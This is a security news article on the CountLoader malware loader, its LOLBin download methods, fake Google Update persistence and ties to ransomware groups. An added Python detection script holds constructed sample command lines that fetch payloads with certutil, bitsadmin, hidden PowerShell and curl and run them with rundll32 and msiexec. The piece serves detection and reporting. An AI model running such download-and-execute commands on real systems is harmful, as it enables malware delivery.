
Cybersecurity researchers have discovered a new malware loader, code-named CountLoader, that Russian ransomware gangs are using to deliver post-exploitation tools such as Cobalt Strike and AdaptixC2, as well as a remote access trojan known as PureHVNC RAT.
"CountLoader is being used either as part of an Initial Access Broker (IAB) toolset or by ransomware affiliates with ties to the LockBit, Black Basta and Qilin ransomware groups," Silent Push said in its analysis.
The new threat comes in three different versions, written in .NET, PowerShell and JavaScript, and has been observed in campaigns targeting Ukrainian individuals with PDF-based phishing lures that impersonate the Ukrainian National Police.
It is worth noting that the PowerShell version of the malware was previously documented by Kaspersky as being distributed using DeepSeek-related decoys.

According to the Russian cybersecurity vendor, that attack led to the deployment of an implant called BrowserVenom, which forces browser traffic through a proxy controlled by the threat actors, reconfiguring every browser instance so that the attackers can manipulate network traffic and collect data.
According to Silent Push's investigation, the JavaScript version is the most fully developed implementation of the loader, offering six different methods for downloading files, three different methods for running malware binaries, and built-in capabilities to identify victim devices based on Windows domain information.
The malware can also establish persistence on the host, collect system information, create scheduled tasks that impersonate the Google Update task used by the Chrome web browser, and connect to a remote server to await further instructions.
These instructions include the ability to download and run DLL and MSI payloads using rundll32.exe and msiexec.exe, to send system metadata, and to delete the scheduled tasks it has created. The six file-download methods rely on curl, PowerShell, MSXML2.XMLHTTP, WinHttp.WinHttpRequest.5.1, bitsadmin and certutil.exe.
"By implementing a cryptographic PowerShell generator for the 'fly' command, and using LOLBins such as 'certutil' and 'bitsadmin', the CountLoader developers demonstrate a sophisticated understanding of Windows operating systems and malware development," Silent Push said.
A notable aspect of CountLoader is its use of the victim's Music folder as the staging location for the malware. The .NET flavor shares some functionality with its JavaScript counterpart, but supports only two command types (updateType.zip or updateType.exe), indicating a stripped-down version.
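The behaviours described above (the six LOLBin download methods, DLL and MSI execution via rundll32.exe and msiexec.exe, a scheduled task borrowing the Google Update name, and staging in the victim's Music folder) map directly onto host-side triage checks. The following Python is an added example written for this article; it is not Silent Push's tooling and contains nothing taken from the CountLoader samples. The command lines, script fragment, scheduled-task records, the host name example.invalid and the user name "victim" are all constructed for the demonstration.

```python
"""Triage checks for the CountLoader tradecraft described in the article.

Added example, not vendor code. The patterns encode only the behaviour the
article names: six download methods, two execution primitives, a fake
Google Update scheduled task, and staging under the victim's Music folder.
All sample data below is constructed (host example.invalid, user "victim").
"""
import re
from typing import Dict, Iterable, List, Set

# Download methods attributed to the JavaScript build, as case-insensitive
# patterns over a process command line or a script body. The two COM objects
# are instantiated inside the script, so they appear in script content rather
# than on the wscript/cscript command line.
DOWNLOAD_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "curl": re.compile(r"\bcurl(?:\.exe)?\b[^\n]*https?://", re.I),
    "powershell": re.compile(
        r"\bpowershell(?:\.exe)?\b[^\n]*"
        r"(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)", re.I),
    "msxml2.xmlhttp": re.compile(r"MSXML2\.(?:Server)?XMLHTTP", re.I),
    "winhttp.winhttprequest.5.1": re.compile(r"WinHttp\.WinHttpRequest\.5\.1", re.I),
    "bitsadmin": re.compile(r"\bbitsadmin(?:\.exe)?\b[^\n]*/transfer\b", re.I),
    "certutil": re.compile(r"\bcertutil(?:\.exe)?\b[^\n]*-urlcache\b", re.I),
}

# Execution primitives the loader uses for DLL and MSI payloads.
EXEC_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "rundll32": re.compile(r"\brundll32(?:\.exe)?\b[^\n]*\.dll\b", re.I),
    "msiexec": re.compile(r"\bmsiexec(?:\.exe)?\b[^\n]*\.msi\b", re.I),
}

MUSIC_FOLDER = re.compile(r"\\Users\\[^\\]+\\Music\\", re.I)
# A real Google Update task action lives under Google's install directory;
# a task with that branding pointing anywhere else deserves a look.
LEGIT_GOOGLE_DIRS = re.compile(r'^"?C:\\Program Files(?: \(x86\))?\\Google\\', re.I)


def detect_methods(text: str) -> Set[str]:
    """Return the download/execution methods visible in a command line or script."""
    hits = {name for name, rx in DOWNLOAD_PATTERNS.items() if rx.search(text)}
    hits |= {name for name, rx in EXEC_PATTERNS.items() if rx.search(text)}
    return hits


def staged_in_music(text: str) -> bool:
    """True if the text references a path under any user's Music folder."""
    return MUSIC_FOLDER.search(text) is not None


def suspicious_task(name: str, action: str) -> bool:
    """Flag a task that borrows Google Update's name but runs something
    outside Google's directory, or anything staged in the Music folder."""
    if "googleupdate" not in name.replace(" ", "").lower():
        return False
    return not LEGIT_GOOGLE_DIRS.match(action) or staged_in_music(action)


def triage(cmdlines: Iterable[str], tasks: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Bucket findings across process command lines and scheduled-task records."""
    findings: Dict[str, List[str]] = {
        "lolbin_download": [], "lolbin_exec": [], "music_staging": [], "fake_google_task": []}
    for line in cmdlines:
        for method in sorted(detect_methods(line)):
            bucket = "lolbin_exec" if method in EXEC_PATTERNS else "lolbin_download"
            findings[bucket].append(f"{method}: {line}")
        if staged_in_music(line):
            findings["music_staging"].append(line)
    for task in tasks:
        if suspicious_task(task["name"], task["action"]):
            findings["fake_google_task"].append(f'{task["name"]} -> {task["action"]}')
    return findings


# Constructed sample data (not captured telemetry).
SAMPLE_CMDLINES = [
    r"certutil.exe -urlcache -split -f http://example.invalid/s C:\Users\victim\Music\stage.bin",
    r"bitsadmin /transfer job /download /priority high http://example.invalid/p C:\Users\victim\Music\payload.dll",
    r"powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/m','C:\Users\victim\Music\pkg.msi')",
    r"curl.exe -s -o C:\Users\victim\Music\tool.exe http://example.invalid/t",
    r"rundll32.exe C:\Users\victim\Music\payload.dll,Start",
    r"msiexec /i C:\Users\victim\Music\pkg.msi /qn",
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer',  # benign
]
SAMPLE_SCRIPT = ('var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
                 'var w = new ActiveXObject("WinHttp.WinHttpRequest.5.1");')
SAMPLE_TASKS = [
    {"name": "GoogleUpdateTaskMachineUA",
     "action": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua'},  # legitimate
    {"name": "GoogleUpdateTaskMachineCore",
     "action": r"wscript.exe C:\Users\victim\Music\update.js"},  # impersonation
]

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_CMDLINES, SAMPLE_TASKS).items():
        print(bucket, len(items))
    print("script methods:", sorted(detect_methods(SAMPLE_SCRIPT)))
```

The scheduled-task check deliberately keys on the action path rather than the task name alone, because the legitimate GoogleUpdateTaskMachine* tasks exist on any host with Chrome installed; the name is the lure, the out-of-place executable (here a script in the Music folder) is the signal. On a live host the inputs would come from process-creation telemetry and `schtasks /query /v /fo csv` rather than the constructed lists.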
CountLoader is supported by an infrastructure of more than 20 unique domains, and the malware serves as a conduit for Cobalt Strike, AdaptixC2 and PureHVNC RAT. It is worth pointing out that PureHVNC RAT is the predecessor of PureRAT, which is also known as ResolverRAT.
Recent campaigns distributing PureHVNC RAT have leveraged the tried-and-tested ClickFix social engineering tactic as a delivery vector, with victims lured to ClickFix phishing pages through fake recruitment offers. The trojan is deployed by a Rust-based loader.

"The attackers lured victims through fake job ads, allowing the attackers to run malicious PowerShell code via the ClickFix phishing technique," the cybersecurity company said, adding that PureCoder uses a rotating set of GitHub accounts to host files that support PureRAT's functionality.

An analysis of the GitHub commits revealed that the activity was carried out from the UTC+03:00 time zone, which corresponds to a number of countries, Russia among them.
The development comes as the DomainTools Investigations team uncovered the interconnected nature of the Russian ransomware landscape, identifying the movement of threat actors between groups and the use of tools such as AnyDesk and Quick Assist, and pointing to operational overlap.
"Brand loyalty among these operators is weak, and human capital appears to be the major asset, not a specific malware stock," DomainTools said. "Operators adapt to market conditions and reorganize in response to takedowns, and trust is important. These individuals choose to work with people they know, regardless of the organization's name."